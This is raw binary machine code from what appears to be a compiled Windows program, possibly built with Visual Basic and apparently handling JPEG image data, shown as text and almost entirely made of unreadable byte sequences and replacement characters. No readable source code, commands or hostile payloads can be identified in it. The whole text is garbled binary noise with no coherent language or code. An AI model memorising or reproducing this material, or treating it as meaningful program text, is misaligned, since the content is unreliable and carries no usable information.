����M�Q輸����<����׋�<�����8���jRPǅ8���    荞���׍����Q��tB ��D����u�=�rB �   ���   ��D����؋������o����U��E�RP������׋M�Q�+����׋U�R� ����כh�A �����P��tB �M�Qj �sB ËEP��R�E ��@���_^��M�E�d�    [��]� �_v���tB �������������U���h�@ d�    Pd�%    ��   SV�uW�e�3���E�p@ V�}��P�M�}�}؉}ȋ�}�R�}��}���rB =��  ��   �XtB P�E�P�sB �� ��U��MȉE��E�
   �E��E�
   �E��t@ �E�   �ptB �U��E�RP�UȍE�R�E� ��E�
   �PjV�QD;�}jDh�[@ VP� sB �M���tB �M��U�Q�E�R�M�PQj��rB �u���U��L  ��<tB h��A �%�M���tB �E��M�P�U�Q�E�RPj��rB ���ËEP��Q�M�E�_^d�    [��]� ����������U���h�@ d�    Pd�%    ��SV�uW�e��E��@ �V�E�    �P�M�E�    �    ��L  �M��<tB h*�A �
�M���tB �ËEP��R�E�M�_^��M�E�d�    [��]� ���������������U���h�@ d�    Pd�%    ��   SV�uW�e�3ۋ��   �E��@ Pj�]�]�]؉]ȉ]��]���d�����sB ���   ���G  ;���   �XtB �U�PR�sB � ��U��M��M��MЉM��M���QR�Mȸ
   �U�Q�E��E��EȉE؋Rj	W�PD;�}jDh�[@ WP� sB �M���tB �E��M�P�U�Q�E�RPj��rB �����   �=htB �U�QRǅd����� �׋M�;�t%f�9u���   �Q�A+�;�r	�hsB �M���	�hsB �M�I��d���j�RQ�_�����rB �ӍU�R��tB ���   �M�PQǅd���JFIF�׋M��t4f�9u.���   �Q�A���
  +�;�r	�hsB �M�ǋ=htB �	�hsB �M�I��d���j�RQ�ޙ���ӍU�R��tB ���   �M�PQǅd���  �׋M��t4f�9u.���   �Q�A����  +�;�r	�hsB �M�ǋ=htB �	�hsB �M�I��d���j�RQ�c����ӍU�R��tB ���   �M�PQǅd���  �׋M��t4f�9u.���   �Q�A���  +�;�r	�hsB �M�ǋ=htB �	�hsB �M�I��d���j�RQ�����ӍU�R��tB ���   �M�PQǅd���    �׋M��t.f�9u(���   �Q�A����   +�;�r	�hsB �M���	�hsB �M�I��d���j�RQ�s����ӍU�R��tB ���   h��A ��pM���   �/�M�Q��tB �M���tB �U��E�R�M�P�U�QRj��rB ���ËM�_^3�d�    [��]� �tB ������������U���h�@ d�    Pd�%    ��,SV�uW�e��E��@ ���   ���   k��M  ���E�    �=  ��t f�8u���   �P�H+�;�r�hsB ��hsB �ع�   ��sB ���   �Q����   ��t,f�8u&���   �P�H����  +�;�r�hsB �]��	�hsB �E̋E��sB ����   �Ӌ��   �Q�M̈
���   ��t2f�8u,���   �P�H���t  +�;�r�hsB �]ȋ�sB �	�hsB �EȋǙ���   ����Ӌ��   �J�UȈ���   ��t2f�8u,���   �P�H���  +�;�r�hsB �]ċ�sB �	�hsB �Eċρ��   �Ӌ��   �Q�MĈ
���   ��t)f�8u#���   �P�H����  +�;�r�hsB ��hsB �����   �Ӌ��   �J�9���   ��t)f�8u#���   �P�H���a  +�;�r�hsB ��hsB �����   ����   ����Ӌ��   �J�9���   ��t)f�8u#���   �P�H���  +�;�r�hsB ��hsB �����   ���   �Ӌ��   �J�9���   ��t)f�8u#���   �P�H����  +�;�r�hsB ��hsB �����   ����   ����Ӌ��   �J�9���   ��t1f�8u+���   �P�H���R  +�;�r�hsB ����sB ��hsB �����   ���   �Ӌ��   �J�9���   ��t)f�8u#���   �P�H��	��  +�;�r�hsB ��hsB �����   �Ӌ��   �J�9���   ���   ��
��  �����   ��  3ۉEԉ]�;��r  ��D  �M�PQ�htB �M���t#f�9u�Q�A+�;�r	�hsB �M������	�hsB �M��Y؋��   ��t f�8u���   �P�H+�;�r�hsB ��hsB �����sB ���   �J�9���   ��t)f�8u#���   �P�H����   +�;�r�hsB ��hsB ���K�Sk���   ���sB ���   �J�9���   ��t)f�8u#���   �P�H����   +�;�r�hsB ��hsB ���K��sB ���   �J�U�R�9��tB ���   �M��pB���   �   �p3�E�Eԋ]�����h��A �M�Q��tB ËM�_^3�d�    [��]� �tB ������������U���h�@ d�    Pd�%    ��<�ESVW��e�3�Q�E��@ �}�}���rB �؃��e  ���,  �u���   ;�t f�8u���   �P�H+�;�r�hsB ��hsB ����   ��sB ���   �J�9���   ��t)f�8u#���   �P�H����  +�;�r�hsB ��hsB ����   ��sB ���   �J�9���   ��t)f�8u#���   �P�H����  +�;�r�hsB ��hsB ���Ù���   �����sB ���   �J�9���   ��t)f�8u#���   �P�H���<  +�;�r�hsB ��hsB ���ˁ��   ��sB ���   �J�9���   �E����   ���   �Q��rB �E��   ;}���   ���   �E�   ���E�   t f�8u���   �P�H+�;�r�hsB ��hsB �؋E�U�RW�Q�HsB �ЍM���tB P��rB ����sB ���   �J��M���tB �M���rB ���   �   ��pAǉ��   p7���M���hX�A ��M���tB �M���rB �ËM�_^3�d�    [��]� �tB �������������U���h�@ d�    Pd�%    ��   �ESV�uW�ȋ��   3����e��Z  ;��E��@ �}�}؉}ȉ}��}��}���   ���   ���*  ;ω��   t%f�9u�Q���  +؋A;�r�hsB ��hsB �ع�   ��sB ���   �J����   ;�t-f�8u'���   �P�H����  +�;�r�hsB ��3���hsB �ع�   ��sB ���   �J��U���r�hsB ����  ��؉�\����?   ;�$��@r�hsB f�<{� �   ��9  ���Ӄ�@��   ���   ��t"f�8u���   �P�H�hsB +�;�r����hsB �hsB ���M�	��sB ���   ǅL���?   �J�9���   ����  ���   3�;�L�����  ��@r�Ӌ��   ��t f�8u���   �P�H+�;�r�hsB ��Ӌ؋�\���f�x��sB ���   �Q����   ���hsB �H  ���   �   ��5  ���t������   ��   �XtB �M�PQ�sB ��� ��
   �U��MȉE��]��E��]��E��t@ �E�   �ptB �E��M�PQ�EȍM�P�E� ��]؋QjW�RD��}jDh�[@ WP� sB �M���tB �U��E�R�M�P�U�QRj��rB �����   ��t f�8u���   �P�H+�;�r�hsB ��hsB ���E�����sB ���   ǅD���?   �Q�:���   ���   ���   3�;�D�����   ��@r�hsB ���   ��t f�8u���   �P�H+�;�r�hsB ��hsB �؋�\���f�yf�f��� f�f��f����sB ���   ��@�J�r�hsB ���   ��t)f�8u#���   �P�H���r  +�;�r�hsB ��hsB �؋�\����z���   ��sB ���   �Q����   ���,  ���   �   ��  ��������hsB ���   ��t(f�8u"�]�P�H������   +�;�r�hsB ��Ӌ]�����   +���   ����   ����   �����sB ���   �Q�:���   ��t!f�8u�P�H����p+�;�r�hsB ��hsB �����   +�p_��pZ���   ��sB ���   h�A �Q�:�%�M���tB �E��M�P�U�Q�E�RPj��rB ���ËM�_^3�d�    [��]� �tB ���D$SUV�t$�ȃ�W���   ��  ;���   ���   ����  �ɉ��   t'f�9u!�Q����  �hsB +��A;�r����hsB �hsB ����   ��sB ���   �J�9���   ��t%f�8u���   �P�H���I  +�;�r����Ӌ���   ��sB ���   �J�9��hsB �T$ �l$f�: �} ��  ��r�Ӌǋ�8  ��Ǎ����   ��څ��\$t f�8u���   �P�H+�;�r�hsB ��hsB ���M ����sB ���   �Q�:���   ����  3퉆�   3���r�hsB ���   ��t&f�8u ���   �P�H+�;�r�hsB �Ë\$��hsB ���   �Q�;����   ���%  �����   r�hsB 3��;��  ����  ���q�������  3����  ��   r�hsB ���   ��t&f�8u ���   �P�H+�;�r�hsB �Ë\$��hsB ���   �Q�L����   ���  �����   �p  ;�~��  ��r�Ӌǋ�   ��Ǎ����   ��څ��\$t f�8u���   �P�H+�;�r�hsB ��hsB ���M ��sB ���   �Q�:���   ����  3퉆�   3���r�hsB ���   ��t&f�8u ���   �P�H+�;�r�hsB �Ë\$��hsB ���   �Q�;����   ����  �����   r�hsB 3��;��j  ���a  ���q������O  3���|v��   r�hsB ���   ��t&f�8u ���   �P�H+�;�r�hsB �Ë\$��hsB ���   �Q�L����   ����   �����   ��   ;�~����   ��t)f�8u#�\$�P�H������   +�;�r�hsB ��hsB �\$�����   �-�sB +���   ��p{����   ����Ջ��   �Q�:���   ��t!f�8u�P�H����pB+�;�r�hsB ��hsB �����   +�p"��p���   �Ջ��   �Q�:_^]3�[� �tB ��SVW�|$���   ��t"f�8u���   �P�H�hsB +�;�r���
�hsB �Ӌ��   ��sB ���   �Q�2���   ��t!f�8u���   �P�H��p?+�;�r����Ӌ��D$���sB ���   �Q�2���   ��p���   _^3�[� �tB ������U���h�@ d�    Pd�%    �� SV�u3�W�E��@ ���   �e�;��M�M�M�t f�8u���   �P�H+�;�r�hsB ��hsB ����sB ��   �Ӌ��   �Q�:���   ��t)f�8u#���   �P�H����  +�;�r�hsB ��hsB ����   ��sB ���   �Q�:���   ��t)f�8u#���   �P�H����  +�;�r�hsB ��hsB ��3��Ӌ��   �Q�:���   ��t)f�8u#���   �P�H���C  +�;�r�hsB ��hsB ���   �Ӌ��   �Q�:���   ��t)f�8u#���   �P�H����  +�;�r�hsB ��hsB ���   �Ӌ��   �Q�:���   ����  ���   ��D  ��t%f�8u�M�P�9�H+�;�r�hsB ������hsB �؋��   ��t f�8u���   �P�H+�;�r�hsB ��hsB ����D  �B���sB �Ӌ��   �Q�:���   ��t)f�8u#���   �P�H���	  +�;�r�hsB ��hsB ���E�U��k���  ��Ӌ��   �Q�:���   ���   ����  �ɉ��   tf�9u+A���A;�r�hsB ��hsB ����sB 3��Ӌ��   �Q�:���   ��t)f�8u#���   �P�H���T  +�;�r�hsB ��hsB ���?   �Ӌ��   �Q�:���   ��t)f�8u#���   �P�H���  +�;�r�hsB ��hsB ��3��Ӌ��   �Q�:���   ��D  ���U�Q��   R���   �htB �M؅�t(f�9u"�E�Q�8�A+�;�r	�hsB �M؍����	�hsB �M؋I�E�    ȍy�IQj��sB ��؃�Vp]�E�    �RD�E�;Ët�M�UQR�M�U�QRWV�PP��V�PH�M�Q��tB hR�A �U�R��tB ËM�_^3�d�    [��]� �tB ���U���h�@ d�    Pd�%    ��  SV3�W�E��E܉EԉEЉE��E��E��E��E��E���t�����p�����l�����h����e��E�hTu@ P�E��@ ��sB �M�U�}�1�+��   �  ���v  ��k��k  ���b  ��t,f�8u&���   �P+ʋP;ʉM�r	�hsB �M���������hsB ��������   ��sB ���   �Q�������
���   ��t/f�9u)���   �Q����  +Q;E�r�hsB �E���hsB ��   ��������sB ���   �J����������   ��t/f�9u)���   �Q����  +Q;E�r�hsB �E���hsB �������Ù���   �����sB ���   �Q�������
���   ��t/f�9u)���   �Q���  +Q;E�r�hsB �E���hsB �ˉ��������   ��sB ���   �J����������   ��t)f�8u#���   �P�H����  +�;�r�hsB ��hsB �؋���sB ���   �Q�M����   ���t  ���   �E����P����M苕P����E�;���  ��D  ��tdf�8u^�E� ��t$f�8u�]�P�H+�;�r�hsB ��    ��hsB �U��D  ��R��Q�A+�;�r�hsB �4�����hsB �����   ��t f�8u���   �P�H+�;�r�hsB ��hsB �؋�D  �H�1��sB ���   �J�U����t$f�8u�]�P�H+�;�r�hsB ��    ��hsB �M���������t$f�8u�]�P�H+�;�r�hsB �4�    ��hsB �����   ��t)f�8u#���   �P�H����  +�;�r�hsB ��hsB �؋U��������H�E��k��B��  0��sB ���   �Q�M����   ����  ���   �   ���  �E��������   ��t f�8u���   �P�H+�;�r�hsB ��hsB ����sB 3��Ӌ��   �Q�2���   ��t)f�8u#���   �P�H���  +�;�r�hsB ��hsB ��?   �Ӌ��   �Q�2���   ��t)f�8u#���   �P�H����  +�;�r�hsB ��hsB ��3���sB ���   ��sB �Q�M�2���   �u���z  ���   ����   �R��Pj �]  Qj�U�j Rjj �ӋE���$��E�QRjj Pjj �ӋM�����M�RPjj Qjj �ӋU�����U�PQjj Rjj �Ӌ��   �������   k���  ���  ����  k����  �����   �E�����   k���  Ë�tB ��  ����  k����  ���M�E̋�1��H����u�;�H����d  ��D  ��t���RP�htB ��t�����taf�8u[�M���t!f�8u�P�H+�;�r�hsB ��    ��hsB �U�
�Q�4��t����P�H+�;�r�hsB ������hsB ��t������   �Iȉ�d����Q����  ������ۅ����ݝ����ۇ�   ݝ����݅�����= @B  uܵ������������������P�����p  ��tB ���%�@ ���X  ��tB ����E�    U�����d������@�u����-  ��@���;���   �M���tIf�9uC�E�+A;A�E�r�hsB �M��U��A+ЋA;ЉU�r�hsB �M��U��A��E����	�hsB �M�k�@�U��I��  ����  �4�u��   ���  �Ћ�@����U��d����M܅�t3f�9u-�EȋQ+Q;E�r�hsB �M܋E���    ��������hsB �M܉�������d����I�P�ƃ��+  k�@�"  �Ћ������  ��Mԅ�t3f�9u-�EȋQ+Q;E�r�hsB �MԋE���    ��������hsB �Mԉ������Ƌ�d�����~�A��������Mԅ�t'f�9u!�uȋQ�A+�;�r	�hsB �Mԍ�    �	�hsB �MԋQ�< uC��t'f�9u!�uȋQ�A+�;�r	�hsB �Mԍ�    �	�hsB �Mԋ�d����I�R���t���P�ӋMȸ   ��  ���u������W�QD�Ẽ���  ��8����   ��8����5hsB ;��E���	  �M�   ����  ��0���;��E���  �U��U��(�����E�;�(�����  ��D  ��p���PQ�htB ��p�����t`f�8uZ�U���t$f�8u�uȋP�H+�;�r�hsB ��    ��֋M��J�4��p����P�H+�;�r�hsB ������֋�p����r���`����F�� ����   �� ����E�;���  �N�   �����������E�;���  �U�M��PQ�htB �E���t,f�8u&�]ȋP�H��+�;�r�hsB ��    ��������hsB �]ȉ������E�U��QR�htB �E���t#f�8u�P�H��+�;�r�hsB ��    ��hsB �MЍU�QR�������htB �E���t#f�8u�P�H��+�;�r�hsB ��    ��hsB �؋E��M�PQ�htB �M���tOf�9uI�}ȋQ�A+�;�r	�hsB �M��u��Q�A����  +�;�r	�hsB �M��A��ǋ}���	�hsB �M��u���������I�v��������V�u��v��}V�u��v�V��`���Q�FPW�RP��tB �M�Q�ӍU�R�ӍE�P�ӍM�Q�ӋM��   ��  �7����M��   ���  ������p���R�ӋMȋ5hsB �   ���0�����  �E��+����U�   ���  ������E�U��2�����������u�;���  ��D  ��l���PQ�htB ��l�����taf�8u[�U���t!f�8u�P�H+�;�r�hsB ��    ��hsB �M��J�4��l����P�H+�;�r�hsB ������hsB ��l����Jȉ�\����A������   ������E�;���  �Q�E�   �� ����� ����U�;��~  �Mԅ�t'f�9u!�uȋQ�A+�;�r	�hsB �Mԍ�    �	�hsB �MԋI�U�;�{  �MЅ�t'f�9u!�uȋQ�A+�;�r	�hsB �MЍ�    �	�hsB �MЋI���sB �U�f��E�U��QR�htB �E���t$f�8u�uȋP�H+�;�r�hsB ��    ��hsB �M�������E��RP�htB �E���t*f�8u$�uȋP�H+�;�r�hsB ��    ��������hsB �������UЍE�RP�htB �M���t'f�9u!�uȋQ�A+�;�r	�hsB �M���    �	�hsB �M��u��U��U���������E�    �v�I�������V�u�ȍE��v��}VQ�M�PQW�RP�U�R�ӍE�P�ӍM�Q���  �U�M��PQ�htB �E���t.f�8u(�]ȋP�H�=hsB ��+�;�r�׍�    ��������=hsB �׋]ȉ������E�U��QR�htB �E���tf�8u�P�H��+�;�r�׍�    ��׋MЍU�QR�������htB �E���tf�8u�P�H��+�;�r�׍�    ��׋M��U�QR�������htB �M���tLf�9uF�}ȋQ�A+�;�r	�hsB �M��u��Q�A����  +�;�r	�hsB �M��A�������׋M��}��������I�U���������W�}���\����2����������W�}���WQPR�VP�5�tB �M�Q�֍U�R�֍E�P�֍M�Q�֋}�ދM��   ���\����I  �E��q����U��   ��1  �;�����l���R�ӋMȸ   ��  ���f����E�U��2�������u�;�������  ��D  ��taf�8u[�E� ��t!f�8u�P�H+�;�r�hsB ��    ��hsB �U��D  ��R�4�Q�A+�;�r�hsB ������hsB ��D  �E�    �Q�D���_  ������9E��/  �M���tCf�9u=�]ȋQ�A+�;�r	�hsB �M��}��Q�A+�;�r	�hsB �M��q�������hsB �M����E܅�t-f�8u'�}ȋX�P+�;�r	�hsB �M���    ��|�����hsB �M���|�����tCf�9u=�]ȋQ�A+�;�r	�hsB �M��}��Q�A+�;�r	�hsB �M��A������	�hsB �M��U܋I��|����R�41�:�}��tB �B  �4�M��   ��/  �E�������������Mȸ   ��  �Eȋ������M�   ���  �����   �M�E�;��9  �E�U��2�������������u�;��  ��D  ��h���PQ�htB ��h�����taf�8u[�U���t!f�8u�P�H+�;�r�hsB ��    ��hsB �M��J�4��h����P�H+�;�r�hsB ������hsB ��h����Jȉ�X����A�������   �������E�;��.  �Q�E�   �������������U�;���  �E���tLf�8uF�]ȋP�H+�;�r	�hsB �E��u��P�H����  +�;�r	�hsB �E��x�������hsB ���Mԅ�t'f�9u!�uȋQ�A+�;�r	�hsB �Mԍ�    �	�hsB �MԋI�U�;~�E�M�;�u3���   ��X����Q�ARj��x�����sB �M��Q3�9:�����d  �MЅ�t)f�9u#�uȋQ�A�hsB +�;�r�ӋMЍ�    ��hsB �ӋMЋQ���sB �M��U�=htB f���M�PQ�׋E���t&f�8u �uȋP�H+�;�r�Ӎ�    ��t�����Ӊ�t����E�U��QR�׋E���t f�8u�uȋP�H+�;�r�Ӎ�    ��ӋMЍU�QR��p����׋M���t#f�9u�uȋQ�A+�;�r�ӋM���    ��ӋM��}���t����U��E�    �U���I���p���W�}��UȍE���2�WQ�M�PQR�VP�5�tB �U�R�֍E�P�֍M��  �U�M��PQ�htB �E���t.f�8u(�}ȋP�H�hsB ��+�;�r�Ӎ�    ��l�����hsB �Ӌ}ȉ�l����E�U��QR�htB �E���tf�8u�P�H��+�;�r�Ӎ�    ��ӋMЍU�QR��h����htB �E���tf�8u�P�H��+�;�r�Ӎ�    ��ӋM��U�QR��d����htB �M���tAf�9u;�Q�A+�;�r�ӋM��u��Q�A����  +�;�r�ӋM��A�������ӋM��}���l����I�U�����h���W�}���x����2����d���W�}���WQPR�VP�5�tB �M�Q�֍U�R�֍E�P�֍M�Q�֋M��}��tB �   ���X�����   �E�������U��   ���   �������h���R�ӋMȸ   ���   ��������M�   ���   �����W�PH�hc�A ��5�tB �M�Q�֍U�R�֍E�P�֍M�Q��Ë5�tB ��t���R�֍�p���P�֍�l���Q�֍�h���R�֋5sB �E�Pj �֍M�Qj �֍U�Rj �֍E�Pj �֍U��M�Rj �M���ËM�_^3�d�    [��]� �>���tB �������������U���h�@ d�    Pd�%    ��<�ES�]V� W3ɋ��e��E��@ �M܉M؉MԉMЉu���M�M�M;1��  ��D  ��tff�8u`�U���t#f�8u�P�H��+�;�r�hsB ��    ��hsB �U��D  ��R�4�Q�A+�;�r�hsB �4����u���hsB �E�����D  ��tff�8u`�E� ��t#f�8u�P�H��+�;�r�hsB ��    ��hsB �U��D  ��R�4�Q�A+�;�r�hsB ���u�����hsB ��D  �I�T1�u��T�  ��  �����	  ��
�E�}�~'�u�ǃ��E�������  ;�t8����  �}��*�u��+���  3҃��M��3�;9����u�E�����f�}� �o����׃���  ;��   �E�=htB �UԋQR�׋Eԅ�t$f�8u�u�P�H+�;�r�hsB ��    ��hsB �M�E��E؋RP�׋E؅�t$f�8u�u�P�H+�;�r�hsB �<�    ��hsB ���M�E܋RP�htB �M܅�t'f�9u!�u�Q�A+�;�r	�hsB �M܍�    �	�hsB �M܋uԋ�]��I�v��]V�u؋v�VQS���   �5�tB �U�R�֍E�P�֍M�Q�֋}�3����E�u�E��<����׋���M�pc�U�Q�M�U�R�UQ�MRQS���   3����E�u�E�����h��A ��5�tB �U�R�֍E�P�֍M�Q���ËM�_^3�d�    [��]� �tB �����������U���h�@ d�    Pd�%    ��\  SV�5�sB W�e��E�3�h�s@ P�E� @ �]Љ]ȉ]��]��]��]���t�����d�����T�����D����� ���������� ����֍M�h�s@ Q�֋}�E�5�sB ��RQj�U�SRjS�փ��E�SjjSPjS�փ��M�SjjSQjS�֋���E��E��]��E�U�;�5  �M��D  ��tdf�8u^�}���t$f�8u�u��P�H+�;�r�hsB ��    ��hsB �U��D  ��R�4�Q�A+�;�r�hsB �<�����hsB ���E��D  ��tgf�8ua�M���t$f�8u�u��P�H+�;�r�hsB ��    ��hsB �U��D  �U��R�4�Q�A+�;�r�hsB ������hsB �M�u���D  �J�T9�T��  ���  ������  ��
�u�~'�M��ƃ��E�������  ;�t:����  �u��,�U���+���  3҃��M�93�;�����u�E�����f�}� �h����]��u��Ӄ��M  ;��H  �E���t[f�8uU�E� ��t!f�8u�P�H+�;�r�hsB ��    ��hsB �M��J�4�E��P�H+�;�r�hsB �6��hsB �U��Jf����EЅ�t^f�8uX�U���t$f�8u�u��P�H+�;�r�hsB ��    ��hsB �M��J�4�EЋP�H+�;�r�hsB �6��hsB �UЋJf����M���t7f�9u1�u��Q�A+�;�r	�hsB �M��Q�6f�  �E�3ۉE��#����hsB �M�3ۋQf�  �E��E�����������	  ;�ŋE���t]f�8uW�E� ��t#f�8u�P�H��+�;�r�hsB ��    ��hsB �M��J�4�E��P�H+�;�r�hsB �6��hsB �U��Jf����EЅ�t]f�8uW�U���t#f�8u�P�H��+�;�r�hsB ��    ��hsB �M��J�4�EЋP�H+�;�r�hsB �6��hsB �UЋJf����M���t"f�9u�Q�A��+�;�r	�hsB �M��6�	�hsB �M��Qf����   ���  ��������]�hsB 3�ǅ����   �u�;�������  �M���tf�9u�y�Q+�;�r�Ѝ6��ЋM��Qf�< �  �E�U�=hsB ��2�������u�;������r  �E�� �����D  QR�htB �� �����tOf�8uI���tf�8u�P�H+�;�r�׍�    ��׋�Q�4�� ����P�H+�;�r�׍�����׋� ����]�y����t$f�8u�u��P�H+�;�r�hsB ��    ��hsB ��J�U�9��   �M���t#f�9u�u��Q�A+�;�r	�hsB �M��6�	�hsB �M��If�< t'�U؋E�� ����W�R�W��R�� ���RWP�Q\��E؍� ����� ����E��R�WP�QX�� ���P��tB �M��]�=hsB �   ���  �E��������   3��   f;�;����  r�hsB ��  r�hsB �M�E���f��fω��~  ��뻋EԍU؃��� ���r�hsB �}ԋ]�Ǎ� ������Q��   �4�������RS�P<���   �   ��d�����t���3Ƀ����   ��d����ى�l�����D���f��L�����t���R��D���P��T���QRǅ|���   �@tB ��T���P�dtB ���� ���r�hsB ��� ���R��   �VS�Q@��T�����d���P��t���Q��D���RPj��rB ��ǅ����   3��������u�;��  ��  r�hsB �M��<� ��   ��r�hsB ��   r�hsB �Mԋ������   ����ۄ�  ݝ����������������RP��rB ݝ���݅�����@ ����  ��tB �E�ݝ����܅�����%�@ ����  ��tB ��  ��r�hsB �M��E�������  ȋ}��|  �����U�����f  �Eȋ��3�+�3�+E��   ��E  ��������EЅ�t f�8u�uԋP�H+�;�r�hsB �6��hsB �UЋJf�< �  �U�M�=hsB ��������;�������   �U���tf�8u�P�H��+�;�r�׍�    ��׋M��J��E�;���   �u�U��E؋�D  �� ���QR�htB �M���tZf�9uT�E� ��t"f�8u�P��+�P;�r�׋M���    ��׋M��U��R�4�Q�A+�;�r�׍��u����׍� ����R�U��R�DPV�QT�M�Q��tB �   ���  ��������   3��   f;�;����  r�hsB ��  r�hsB �U�M���f��f׉���  ��뻍E؉� ����Eԃ�r�hsB �}ԋ]�Ǎ� �����ǋR��8  �4������PS�Q<��ǅ ����   r�hsB ��8  ��� ����RVS�Q@ǅ�����   3�;������+  ��  r�hsB �E��<� ��   ��r�hsB ��   r�hsB �Mԋ��������8  ��ۄ�  ݝ����������������QR��rB ݝ���݅�����@ ����  ��tB �ƃ�������ۅ����ݝ����܅�����%�@ ���X  ��tB ��  ��r�hsB �M��E������5  ȋ}��*  �����U�����  �Eȋ��3�+�3�+E��   ���   ��������Mԋ]�   ���   �EԡhsB �u��-����E��3�+�3�+E�t	����   �E�h��A ��+�U�R��tB ��T�����d���P��t���QRj��rB ��Í� ���P��tB �5sB �� ����M�Rj �� ����֍E�Pj �֍M�Qj �֍U�Rj �֍�����E�Qj �������ËU �EċM�_�^3�d�    [��]� �,���tB ��������������U���h�@ d�    Pd�%    ���   SVW�}�e�3���E�@ W�u��P�]�u�u܉u؋�u�Q�uЉủuȉuĉu��u��u��u���`�����\�����X�����T�����rB ��u�E�   �  �U�j'R�]��E�@  �tB �ЍM���tB P��rB 3ۍMЅ�������tB f;�t�E�   �t  ���   ��sB ��V��  Pj�M�VQjV�Ӌ��   �����E�V��  RjVPjV�Ӌ��   �����U�V��  QjVRjV�Ӌ��   ������  ��H���3�;���  �M�;�t(f�9u"�Q�A��+�;�r	�hsB �M��    3��	�hsB �M�I3�;މ�   �E��E��u��E���M�P�U�Q�E���RP�E�   f�u��E�   �@tB �E؅�t1f�8u+�P��+ʋP;ʉ�P���r�hsB ��P�������<�����hsB ��<����U�R�dtB �M؋Q��<����
�U��E�R�M�P�U�QRj��rB �   ���E��E��E��M�P�U�Q�E�RP�E�   �E�    f�u��E�   �@tB �E܅�tf�8u�P�H��+�;�r�hsB ����hsB ���M�Q�dtB �U܋J�U�R�U��1�E��M�PQRj��rB �   �����  �؋�H���3��O������   ��T��������  ��X�����X���RP��\����E�RP�U؍E�RPW��\������   ��L  ��T�����L  R�M���rB ��8���ۅ8���ݝ0����E�ݝ(���݅(�����@ �%�@ ܅0������)  ��tB VP���   jVQjV��$�����sB �����\������   QWǅ\����   �P|�W�Rh�P��rB ��~�SW�Qp��rB hpu@ hHk@ �ӋЍM���tB Ph�u@ �ӋЍM���tB PhHk@ �ӋЍM���tB Ph�u@ �ӋЍM���tB ��E�PW�Rp�MčU�Q�E�R�M�PQj�DtB ���   �����\�����\���PQW�Rt���   �   ;�~���   ���\�����\���PQW�Rt���\���PWǅ\����   �Rl���`���R���   ��\�����`���PRW��\����Qx���`���Q���   ��\���ǅ`�������RQW��\����Px9��   ~R���`���P���   ��\�����`���QPW��\����Rx���`���R���   ��\���ǅ`�������PRW��\����Qx���   �+Í�X����<  ��X���R��\����U�PR�E؍U�PRW��\������   ���\���QWǅ\����   �P|���   V+���   RS��$���VSjV��sB ���E��E� ��E�
   P�$tB �M�����rB �M�RWj�h   �tB WShpv@ �xsB W�`sB SV�DsB �h��A �3�EčM�P�U�Q�E�RPj�DtB ���M��U��E�QRPj��rB ��Ë5sB �M�Qj �֍U�Rj �֍E�Pj ��ËEP��Q�U�EԋM�_��E�^d�    [��]� ��%���tB ���U���h�@ d�    Pd�%    ��@SV�uW�ƃ���e����E� @ V�E��u�Q3�3ۉ}؉}ԉ}Љ}̉}ȉ}��E�   �}��r�hsB ��r�hsB ���   �M�߉��E������  +؋���  ��~���   ��  �1��~���   �p  �E�   ���}3��E�   ���}	3��E��������B  ����?�E��`����F@�   f��N@f�A �F@�   f�H�~@�   f�G�~@f�O�N@�   f�A

 �N@f�Q�N@f�A�N@f�A �N@f�A�F@f�@ �N@f�A �F@f�P�N@f�A �V@�   f�J�F@�(   f�P�F@f�x �F@f�H"�^@�   f�C$�^@f�C&�F@f�H(�F@f�@*1 �F@f�@,# �F@f�@.% �F@f�@0 �F@f�P2�V@�3   f�B4: �V@f�B6�V@f�B8= �V@f�B:< �V@f�B<9 �V@f�B>�F@�8   f�P@�F@f�@B7 �^@�@   f�CD�^@f�CFH �^@f�CH\ �^@f�CJN �^@f�CL�F@f�@ND �^@�W   f�CP�^@f�CRE �^@f�CT7 �^@f�SV�^@f�CXP �^@f�CZm �^@f�C\Q �^@f�C^�F@f�@`_ �F@f�@bb �^@�g   f�Cd�^@f�Cfh �^@f�Ch�^@f�Cj> �^@f�ClM �^@f�Cnq �^@f�Cpy �^@f�Crp �^@f�Ctd �^@f�Cvx �^@f�Cx\ �^@f�Cze �^@f�C|�^@�c   f�C~�^Xf� �^Xf�C �^Xf�C �^Xf�K�^Xf�C �^Xf�K
�^X�/   f�K�^Xf�{�^Xf�{�~Xf�O�NXf�A�~X�B   f�O�~Xf�W�VXf�J�NXf�A�VXf�B�NXf�A �VXf�B"�NXf�A$�VXf�B&�NXf�A(�VXf�B*�NXf�A,�VXf�B.�NXf�A0�VXf�B2�NXf�A4�VXf�B6�NXf�A8�VXf�B:�NXf�A<�VXf�B>�NXf�A@�VXf�BB�NXf�AD�VXf�BF�NXf�AH�VXf�BJ�NXf�AL�VXf�BN�NXf�AP�VXf�BR�NXf�AT�VXf�BV�NXf�AX�VXf�BZ�NXf�A\�VXf�B^�NXf�A`�VXf�Bb�NXf�Ad�VXf�Bf�NXf�Ah�VXf�Bj�NXf�Al�VXf�Bn�NXf�Ap�VXf�Br�NXf�At�VXf�Bv�NXf�Ax�VXf�Bz�NXf�A|�VXf�B~�Np����?��;f�A�Vp�BZ�|��B>P�?�Np�A�8�{�AzQ�?�Vp�BD��B7>�?�Np�A �;f�A$�Vp�B(I����B,���?�Fp�@0��D��@4���?�Np�   �A8�s��A<ـ�?�EĉEȉẺEи   �EԉE؍Eċ�M�PQ�E̍M�PQ�EԍM�PQV�R$��}j$h0b@ VP� sB ��E�PV�E�K   �R��}jh0b@ VP� sB �E�    �EP��Q�M�E�_^d�    [��]� �tB ������U���h�@ d�    Pd�%    �X  �M��SVW�e��E�(@ �E�    �E�    �E�   �E�   j��sB �E�   j�sB �E�   hw@ h�g@ ��rB �ЍM���tB Phw@ ��rB �ЍM���tB �M���tB �E�   �E�P��rB ����sB f�E��E�   j �M�Qjj h$@B jj ��sB ���E�   f�U�f����  ��T���ǅX���   �E�    ��M��X�����  �M��U�;�T����
  �E�   �E�   �E�   �E���|���ǅt���@  �M�Q�U����o  R��t���P�M�Q�TsB �=$@B  tV�$@B f�:uJ�$@B �M�+H��`����$@B ��`���;Bsǅ���    ��hsB �������`����ቍ�����hsB ������U�R��rB �ЍM���tB P�$@B �H����Qj��rB �M���tB �U�R�E�Pj��rB ���E�	   ������E�
   j �M�Qjj �U�Rjj ��sB ���E�   j �E�Pjj �M�Qjj ��sB ���E�   f�U�f���B  ��L���ǅP���   �E�    ��M��P����  �M܋U�;�L�����   �E�   �}� tL�E�f�8uC�M��U�+Q��`����E���`���;Hsǅ���    ��hsB �������`����������hsB ������M���sB �M��Q������
